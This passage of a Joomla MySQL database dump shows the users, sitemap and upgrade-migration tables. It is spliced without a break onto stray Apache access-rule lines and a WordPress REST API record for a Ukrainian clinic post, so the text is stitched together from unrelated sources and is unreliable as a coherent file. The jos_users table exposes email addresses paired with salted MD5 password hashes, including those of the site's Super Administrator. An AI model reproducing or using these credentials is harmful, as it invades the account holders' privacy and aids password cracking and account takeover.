  `username` varchar(150) NOT NULL DEFAULT '',
  `email` varchar(100) NOT NULL DEFAULT '',
  `password` varchar(100) NOT NULL DEFAULT '',
  `usertype` varchar(25) NOT NULL DEFAULT '',
  `block` tinyint(4) NOT NULL DEFAULT '0',
  `sendEmail` tinyint(4) DEFAULT '0',
  `gid` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `activation` varchar(100) NOT NULL DEFAULT '',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `usertype` (`usertype`),
  KEY `idx_name` (`name`),
  KEY `gid_block` (`gid`,`block`),
  KEY `username` (`username`),
  KEY `email` (`email`)
) ENGINE=MyISAM AUTO_INCREMENT=72 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_users`
--

LOCK TABLES `jos_users` WRITE;
/*!40000 ALTER TABLE `jos_users` DISABLE KEYS */;
INSERT INTO `jos_users` VALUES (62,'Administrator','admin','ekvatorprint@mail.ru','461f033891c9e1f4326b93dbb99670fd:I2yrj17M2WTvfM4rDNTIu0tG491fJW8J','Super Administrator',0,1,25,'2010-11-06 10:50:32','2015-12-08 14:26:21','','admin_language=\nlanguage=\neditor=tinymce\nhelpsite=\ntimezone=0\n\n'),(71,'Thomas Giron','acdrgbddrejos','zipis@noclegor.pl','c13bb4c9ba66e0d7c03a1e20cd3767a1:6qQKrmYcC0ghZqL2VX6wFEQY71AEh9RT','Registered',0,0,18,'2015-07-31 01:24:25','0000-00-00 00:00:00','','\n');
/*!40000 ALTER TABLE `jos_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_weblinks`
--

DROP TABLE IF EXISTS `jos_weblinks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_weblinks` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `sid` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `url` varchar(250) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `archived` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `catid` (`catid`,`published`,`archived`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_weblinks`
--

LOCK TABLES `jos_weblinks` WRITE;
/*!40000 ALTER TABLE `jos_weblinks` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_weblinks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_xmap`
--

DROP TABLE IF EXISTS `jos_xmap`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_xmap` (
  `name` varchar(30) NOT NULL,
  `value` varchar(100) DEFAULT NULL,
  PRIMARY KEY (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_xmap`
--

LOCK TABLES `jos_xmap` WRITE;
/*!40000 ALTER TABLE `jos_xmap` DISABLE KEYS */;
INSERT INTO `jos_xmap` VALUES ('version','1.2.10'),('classname','sitemap'),('expand_category','1'),('expand_section','1'),('show_menutitle','1'),('columns','1'),('exlinks','1'),('ext_image','img_grey.gif'),('exclmenus',''),('includelink','1'),('sitemap_default','1'),('exclude_css','0'),('exclude_xsl','0');
/*!40000 ALTER TABLE `jos_xmap` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_xmap_ext`
--

DROP TABLE IF EXISTS `jos_xmap_ext`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_xmap_ext` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `extension` varchar(100) NOT NULL,
  `published` int(1) DEFAULT '0',
  `params` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=35 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_xmap_ext`
--

LOCK TABLES `jos_xmap_ext` WRITE;
/*!40000 ALTER TABLE `jos_xmap_ext` DISABLE KEYS */;
INSERT INTO `jos_xmap_ext` VALUES (1,'com_acymailing',1,'-1{include_mails=1\nmax_mails=\ncat_priority=-1\ncat_changefreq=-1\nmail_priority=-1\nmail_changefreq=-1\n}'),(2,'com_agora',1,'-1{include_forums=1\ninclude_topics=1\nmax_topics=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nforum_priority=-1\nforum_changefreq=-1\ntopic_priority=-1\ntopic_changefreq=-1\n}'),(3,'com_contact',1,'-1{include_contacts=1\nmax_contacts=\ncat_priority=-1\ncat_changefreq=-1\ncontact_priority=-1\ncontact_changefreq=-1\n}'),(4,'com_content',1,'-1{expand_categories=1\nexpand_sections=1\narticles_order=menu\nadd_pagebreaks=1\nadd_images=0\nmax_images=1000\nshow_unauth=0\nmax_art=0\nmax_art_age=0\ncat_priority=-1\ncat_changefreq=-1\nart_priority=-1\nart_changefreq=-1\nkeywords=1\n}'),(5,'com_docman',1,'-1{include_docs=1\ndoc_task=\ncat_priority=0.5\ncat_changefreq=weekly\ndoc_priority=0.5\ndoc_changefreq=weekly\n}'),(6,'com_eventlist',1,'-1{include_events=1\nmax_events=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(7,'com_g2bridge',1,'-1{include_items=2\ncat_priority=-1\ncat_changefreq=-1\nitem_priority=-1\nitem_changefreq=-1\n}'),(8,'com_glossary',1,'-1{include_entries=1\nmax_entries=\nletter_priority=0.5\nletter_changefreq=weekly\nentry_priority=0.5\nentry_changefreq=weekly\n}'),(9,'com_hotproperty',1,'-1{include_properties=1\ninclude_companies=1\ninclude_agents=1\nproperties_text=Properties\ncompanies_text=Companies\nagents_text=Agents\nmax_properties=\ntype_priority=-1\ntype_changefreq=-1\nproperty_priority=-1\nproperty_changefreq=-1\ncompany_priority=-1\ncompany_changefreq=-1\nagent_priority=-1\nagent_changefreq=-1\n}'),(10,'com_jcalpro',1,'-1{include_events=1\ncat_priority=-1\ncat_changefreq=-1\nevent_priority=-1\nevent_changefreq=-1\n}'),(11,'com_jdownloads',1,'-1{include_files=1\nmax_files=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(12,'com_jevents',1,'-1{include_events=1\nmax_events=\ncat_priority=0.5\ncat_changefreq=weekly\nevent_priority=0.5\nevent_changefreq=weekly\n}'),(13,'com_jmovies',1,'-1{include_movies=1\nmax_movies=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(14,'com_jomres',1,'-1{priority=0.5\nchangefreq=weekly\n}'),(15,'com_joomdoc',1,'-1{include_docs=1\ndoc_task=\ncat_priority=0.5\ncat_changefreq=weekly\ndoc_priority=0.5\ndoc_changefreq=weekly\n}'),(16,'com_joomgallery',1,'-1{include_pictures=1\nmax_pictures=\ncat_priority=-1\ncat_changefreq=-1\npictures_priority=-1\npictures_changefreq=-1\n}'),(17,'com_kb',1,'-1{include_articles=1\ninclude_feeds=1\nmax_articles=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(18,'com_kunena',1,'-1{include_topics=1\nmax_topics=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\ntopic_priority=-1\ntopic_changefreq=-1\n}'),(19,'com_lknanswers',1,'-1{include_files=1\nmax_questions=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nquestion_priority=-1\nquestion_changefreq=-1\n}'),(20,'com_mtree',1,'-1{cats_order=cat_name\ninclude_links=1\nlinks_order=ordering\nmax_links=\nmax_age=\ncat_priority=0.5\ncat_changefreq=weekly\nlink_priority=0.5\nlink_changefreq=weekly\n}'),(21,'com_myblog',1,'-1{include_bloggers=1\ninclude_tag_clouds=1\ninclude_feed=2\ninclude_archives=2\nnumber_of_bloggers=8\ninclude_blogger_posts=1\nnumber_of_post_per_blogger=32\ntext_bloggers=Bloggers\nblogger_priority=-1\nblogger_changefreq=-1\nfeed_priority=-1\nfeed_changefreq=-1\nentry_priority=-1\nentry_changefreq=-1\ncats_priority=-1\ncats_changefreq=-1\narc_priority=-1\narc_changefreq=-1\ntag_priority=-1\ntag_changefreq=-1\n}'),(22,'com_rapidrecipe',1,'-1{cats_order=cat_name\ninclude_links=1\nlinks_order=ordering\nmax_links=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nrecipe_priority=-1\nrecipe_changefreq=-1\n}'),(23,'com_remository',1,'-1{include_files=1\nmax_files=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(24,'com_resource',1,'-1{include_articles=1\nmax_articles=\ncat_priority=-1\ncat_changefreq=-1\narticle_priority=-1\narticle_changefreq=-1\n}'),(25,'com_rdautos',1,'-1{include_vehicles=1\ncat_priority=0.5\ncat_changefreq=weekly\nvehicle_priority=0.5\nvehicle_changefreq=weekly\n}'),(26,'com_rokdownloads',1,'-1{include_files=1\nmax_files=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(27,'com_rsgallery2',1,'-1{include_images=1\nmax_images=\nmax_age=\nimages_order=orderding\ncat_priority=0.5\ncat_changefreq=weekly\nimage_priority=0.5\nimage_changefreq=weekly\n}'),(28,'com_sectionex',1,'-1{expand_categories=1\nexpand_sections=1\nshow_unauth=0\ncat_priority=-1\ncat_changefreq=-1\nart_priority=-1\nart_changefreq=-1\n}'),(29,'com_cmsshopbuilder',1,'-1{include_items=1\nmax_items=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nitem_priority=-1\nitem_changefreq=-1\n}'),(30,'com_sobi2',1,'-1{include_entries=1\nmax_entries=\nmax_age=\nentries_order=a.ordering\nentries_orderdir=DESC\ncat_priority=-1\ncat_changefreq=weekly\nentry_priority=-1\nentry_changefreq=weekly\n}'),(31,'com_virtuemart',1,'-1{include_products=1\ninclude_product_images=0\nproduct_image_license_url=\ncat_priority=0.5\ncat_changefreq=weekly\nprod_priority=0.5\nprod_changefreq=weekly\n}'),(32,'com_weblinks',1,'-1{include_links=1\nmax_links=\ncat_priority=-1\ncat_changefreq=-1\nlink_priority=-1\nlink_changefreq=-1\n}'),(33,'com_yoflash',1,'-1{include_yoflash=1\nmax_games=\ncat_priority=-1\ncat_changefreq=-1\ngames_priority=-1\ngames_changefreq=-1\n}'),(34,'com_zoo',1,'-1{include_categories=1\ninclude_items=1\ncat_priority=-1\ncat_changefreq=-1\nitem_priority=-1\nitem_changefreq=-1\n}');
/*!40000 ALTER TABLE `jos_xmap_ext` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_xmap_items`
--

DROP TABLE IF EXISTS `jos_xmap_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_xmap_items` (
  `uid` varchar(100) NOT NULL,
  `itemid` int(11) NOT NULL,
  `view` varchar(10) NOT NULL,
  `sitemap_id` int(11) NOT NULL,
  `properties` varchar(300) DEFAULT NULL,
  PRIMARY KEY (`uid`,`itemid`,`view`,`sitemap_id`),
  KEY `uid` (`uid`,`itemid`),
  KEY `view` (`view`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_xmap_items`
--

LOCK TABLES `jos_xmap_items` WRITE;
/*!40000 ALTER TABLE `jos_xmap_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_xmap_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_xmap_sitemap`
--

DROP TABLE IF EXISTS `jos_xmap_sitemap`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_xmap_sitemap` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  `expand_category` int(11) DEFAULT NULL,
  `expand_section` int(11) DEFAULT NULL,
  `show_menutitle` int(11) DEFAULT NULL,
  `columns` int(11) DEFAULT NULL,
  `exlinks` int(11) DEFAULT NULL,
  `ext_image` varchar(255) DEFAULT NULL,
  `menus` text,
  `exclmenus` varchar(255) DEFAULT NULL,
  `includelink` int(11) DEFAULT NULL,
  `usecache` int(11) DEFAULT NULL,
  `cachelifetime` int(11) DEFAULT NULL,
  `classname` varchar(255) DEFAULT NULL,
  `count_xml` int(11) DEFAULT NULL,
  `count_html` int(11) DEFAULT NULL,
  `views_xml` int(11) DEFAULT NULL,
  `views_html` int(11) DEFAULT NULL,
  `lastvisit_xml` int(11) DEFAULT NULL,
  `lastvisit_html` int(11) DEFAULT NULL,
  `excluded_items` text,
  `compress_xml` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_xmap_sitemap`
--

LOCK TABLES `jos_xmap_sitemap` WRITE;
/*!40000 ALTER TABLE `jos_xmap_sitemap` DISABLE KEYS */;
INSERT INTO `jos_xmap_sitemap` VALUES (1,'Новая карта сайта',1,1,1,1,1,'img_grey.gif','mainmenu,0,1,1,0.5,daily,mod_mainmenu\ndop-menu,1,1,1,0.5,daily,mod_mainmenu','',1,0,15,'xmap',18,0,1700,0,1447697904,0,'',0);
/*!40000 ALTER TABLE `jos_xmap_sitemap` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jupgrade_categories`
--

DROP TABLE IF EXISTS `jupgrade_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jupgrade_categories` (
  `old` int(11) NOT NULL,
  `new` int(11) NOT NULL,
  `section` varchar(255) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jupgrade_categories`
--

LOCK TABLES `jupgrade_categories` WRITE;
/*!40000 ALTER TABLE `jupgrade_categories` DISABLE KEYS */;
INSERT INTO `jupgrade_categories` VALUES (0,2,'0'),(1,1,'com_contact');
/*!40000 ALTER TABLE `jupgrade_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jupgrade_menus`
--

DROP TABLE IF EXISTS `jupgrade_menus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jupgrade_menus` (
  `old` int(11) NOT NULL,
  `new` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jupgrade_menus`
--

LOCK TABLES `jupgrade_menus` WRITE;
/*!40000 ALTER TABLE `jupgrade_menus` DISABLE KEYS */;
INSERT INTO `jupgrade_menus` VALUES (0,0),(29,29),(28,28),(27,27),(26,26),(25,25),(24,24),(23,23),(22,22),(21,21),(20,20),(19,19),(18,18),(17,17),(16,16),(15,15),(14,14),(13,13),(12,12),(11,11),(10,10),(9,9),(8,8),(7,7),(6,6),(5,5),(4,4),(3,3),(2,2),(1,30);
/*!40000 ALTER TABLE `jupgrade_menus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jupgrade_modules`
--

DROP TABLE IF EXISTS `jupgrade_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jupgrade_modules` (
  `old` int(11) NOT NULL,
  `new` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jupgrade_modules`
--

LOCK TABLES `jupgrade_modules` WRITE;
/*!40000 ALTER TABLE `jupgrade_modules` DISABLE KEYS */;
INSERT INTO `jupgrade_modules` VALUES (1,87),(16,88),(17,89),(18,90),(19,91),(20,92),(21,93);
/*!40000 ALTER TABLE `jupgrade_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jupgrade_steps`
--

DROP TABLE IF EXISTS `jupgrade_steps`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jupgrade_steps` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `status` int(11) NOT NULL,
  `extension` int(1) NOT NULL DEFAULT '0',
  `state` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jupgrade_steps`
--

LOCK TABLES `jupgrade_steps` WRITE;
/*!40000 ALTER TABLE `jupgrade_steps` DISABLE KEYS */;
INSERT INTO `jupgrade_steps` VALUES (1,'users',1,0,''),(2,'categories',1,0,''),(3,'content',1,0,''),(4,'menus',1,0,''),(5,'modules',1,0,''),(6,'banners',1,0,''),(7,'contacts',1,0,''),(8,'newsfeeds',1,0,''),(9,'weblinks',1,0,''),(10,'extensions',1,1,''),(11,'com_xmap',1,1,'{\"xmlfile\":\"\\/var\\/www\\/dlstudio\\/data\\/www\\/ekv.workdl.org\\/administrator\\/components\\/com_jupgrade\\/extensions\\/com_xmap.xml\",\"phpfile\":\"\\/var\\/www\\/dlstudio\\/data\\/www\\/ekv.workdl.org\\/administrator\\/components\\/com_jupgrade\\/extensions\\/com_xmap.php\",\"extensions\":null,\"class\":\"jUpgradeComponentXmap\",\"folders\":[],\"tables\":[]}');
/*!40000 ALTER TABLE `jupgrade_steps` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-01-29  1:19:52

Order allow,deny Deny from all Order allow,deny Deny from all {"id":2053,"date":"2020-02-27T17:17:00","date_gmt":"2020-02-27T15:17:00","guid":{"rendered":"http:\/\/levmed.biz\/?p=2053"},"modified":"2022-07-24T21:34:57","modified_gmt":"2022-07-24T19:34:57","slug":"piling-u-kyyevi","status":"publish","type":"post","link":"https:\/\/levmed.biz\/bez-kategoryj\/piling-u-kyyevi\/","title":{"rendered":"\u041f\u0456\u043b\u0456\u043d\u0433 \u0443 \u041a\u0438\u0454\u0432\u0456"},"content":{"rendered":"","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":930,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"default","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"categories":[50],"tags":[],"lang":"uk","translations":{"uk":2053,"ru":929},"pll_sync_post":[],"_links":{"self":[{"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/posts\/2053"}],"collection":[{"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/comments?post=2053"}],"version-history":[{"count":1,"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/posts\/2053\/revisions"}],"predecessor-version":[{"id":2054,"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/posts\/2053\/revisions\/2054"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/media\/930"}],"wp:attachment":[{"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/media?parent=2053"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/categories?post=2053"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/levmed.biz\/wp-json\/wp\/v2\/tags?post=2053"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}